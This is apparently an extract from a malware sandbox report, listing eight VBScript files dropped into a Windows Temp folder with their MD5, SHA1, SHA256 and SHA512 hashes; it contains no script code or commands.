SHA512 bc59142fe7ee449925972e9a77ec93490d520af8d02e648f81fe3af8aa7755709e617d1bc83df67400ef3ac115436160a66a38f6b0087d3fbdcfb955049ea004

C:\Users\Admin\AppData\Local\Temp\e2c9836d-1c54-40a4-b2a2-595e2a692efd.vbs

MD5 6ad35a059bcbda82c5bd886d3717fd49
SHA1 d8475f059324e5a52e3ea2af8ed9513b22a32e6c
SHA256 03f1d446995f790aa4a55848c1161d28eb9526e6330c72d2058acc059a56137d
SHA512 751a09d4db1c6603cdecb025872f89d9697cd3dc541eb839926ebdcc7ebdbd37eadbb06e56aace9df6898538d67b2b0a47ee7d0a56c916aaa30ee485c2d918fb

C:\Users\Admin\AppData\Local\Temp\79d8d831-89f9-4762-b1a4-f88f984104fa.vbs

MD5 fba285925e3d4a6934e8855c5a7f607b
SHA1 264d77d7cfe521b3ddb6320df5d9b7ac698cf82d
SHA256 0d0075c3672b522ada6ed8816b6c95fd462a9f8cd40bf46967bee68dd19b9acd
SHA512 408d57c114d490bc3a2f1f359af3a2b91a58f5da606157b7802b792c154b42d93c02a3e325ed105843b2034142ecb60fe0b2bc6a43d3d8b96028e0fac7e8edf2

C:\Users\Admin\AppData\Local\Temp\4bcc22c2-bfc5-4da7-b57a-f1d64750d21c.vbs

MD5 5e753b39185bd2b6718b3ba7b82aa474
SHA1 a2a90bde15a46f2c451c51e9b2ba9de4faeb8144
SHA256 c769601789b806bf9c264920524f6b7ed27dd1d6eb01bf0020df10e9571c2748
SHA512 1c9b1147baeeae61b42ea6dd72590e78ae23d1e80e96f1df35fe51c24c2d21278bc8d0ec7e204c84a39776e13eaa2e22f66f787f45ec66d3323e51f2e9d6c9d5

C:\Users\Admin\AppData\Local\Temp\2e3b6573-9956-4c08-a354-650a54e4b5fc.vbs

MD5 133b0b141005878ef497aab0ed89d9e4
SHA1 c8313f29635593e1c11a68d89b97fb1f0a5c446b
SHA256 9351880bda96633971197caa9ec767802845d26e3dc5da268ab69299262519b3
SHA512 5a6868e827989cd48db3a2c9545baa3c1f1fd4fd2023529d69f08a13b0facf0c4c7b6e6621ed6be89909fa9a7473be5786e2c1e7caf3f7d656c6445821892963

C:\Users\Admin\AppData\Local\Temp\d5a02c96-5b4d-4eac-be2a-3b9ea31321b6.vbs

MD5 670ca1952cf4cc3076532b671c86b6c0
SHA1 bcb4298927bf213a1e7d3496da7c1fc719541e14
SHA256 8fc1809d6c04c9922db24d125c43d67f939f44b202051dd72103c87afd252a03
SHA512 24331c612d4aafcf61074b77078cdb9e67ffbd0c4614d4965b6678ed97957d16d14f563404f3e6ab102e23dc6208eff5a798008d8858019246e567789759c806

C:\Users\Admin\AppData\Local\Temp\77723675-b9f0-49d6-86aa-6fd4188fef6f.vbs

MD5 1ee3ad79e53f9daf6cb84a9fbe7b14ec
SHA1 8315aea769144989b55d61d7bfc8267eefd5f47f
SHA256 7587b5c9b7e1476869d96641a5f5d5364938d202cd2c364a58cfce5a3a5a4bfb
SHA512 4d7177fb926f140461f0fe6858cdd8b0c0936d957c67961df53e6cd0b13753b6a7e7e2865589172a17ffced01b362be4e225fdabb2e1acceaa3c3d92fb275eac

C:\Users\Admin\AppData\Local\Temp\58cd3153-e99f-4382-8f9d-20b7b99c045d.vbs

MD5 fee8ac1bc4a472ec1285bf070266d40d
SHA1 f12a85efe00a4a40a4d5a0b88df142c9e9387d35
SHA256 49231d4f5941440bb49df789d982dd3fc87f4fa8397a4cd8183285f0a27e67eb
SHA512 4f37e77031939a900408a3ea4f25b975c5e67e3ca71ab825b764a497c263fffca5fb0284365a163476ba245d08ca7a1b8278a04f1a62bfadfea2d50da69dbfc3

C:\Users\Admin\AppData\Local\Temp\a20377c5-42e8-47d2-8941-150cbd2a1243.vbs

MD5 94ae98a099f9e20d7e8514bf87603751
SHA1 dfac2e0cf4d915abdac2f149b7be3172d15ddff8
SHA256 8dd75515a9b4690a3eb907418696de48c2c42750cf530fa78f99d6151dfec7ca
SHA512 7a8c4debeef65e95f3264204e04d976e34ffdf9ef7c530c2583e16dfa04ebc1d045be923111e9402a5ab7d833ed54040ccdcd07a768da7794ef963e09b58d32e